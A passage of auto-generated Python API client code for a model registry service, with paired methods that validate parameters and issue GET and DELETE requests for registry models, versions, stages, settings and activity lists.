if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Get registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_registry_activities(self, owner, name, **kwargs): # noqa: E501
"""Get model activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_activities(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListActivitiesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_activities_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_activities_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get model activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_activities_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListActivitiesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry_activities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry_activities`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry_activities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/activities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListActivitiesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_registry_settings(self, owner, name, **kwargs): # noqa: E501
"""Get registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_settings(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_settings_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_settings_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_settings_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry_settings`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_version(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_version_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def get_model_version_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_version`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `get_model_version`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_version_stages(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version stages # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_stages(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Stage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_version_stages_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def get_model_version_stages_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version stages # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_stages_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Stage, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_version_stages" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_version_stages`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `get_model_version_stages`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_version_stages`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}/stages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Stage', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_registries(self, owner, **kwargs): # noqa: E501
"""List registry models # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registries(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelRegistriesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_registries_with_http_info(owner, **kwargs) # noqa: E501
def list_model_registries_with_http_info(self, owner, **kwargs): # noqa: E501
"""List registry models # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registries_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelRegistriesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_registries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_registries`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelRegistriesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_registry_names(self, owner, **kwargs): # noqa: E501
"""List registry model names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registry_names(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelRegistriesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_registry_names_with_http_info(owner, **kwargs) # noqa: E501
def list_model_registry_names_with_http_info(self, owner, **kwargs): # noqa: E501
"""List registry model names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registry_names_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelRegistriesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_registry_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_registry_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelRegistriesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_version_names(self, owner, name, **kwargs): # noqa: E501
"""List model versions names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_version_names(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelVersionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_version_names_with_http_info(owner, name, **kwargs) # noqa: E501
def list_model_version_names_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""List model versions names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_version_names_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param str mode: Mode the search.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelVersionsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_version_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_version_names`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `list_model_version_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/versions/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelVersionsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
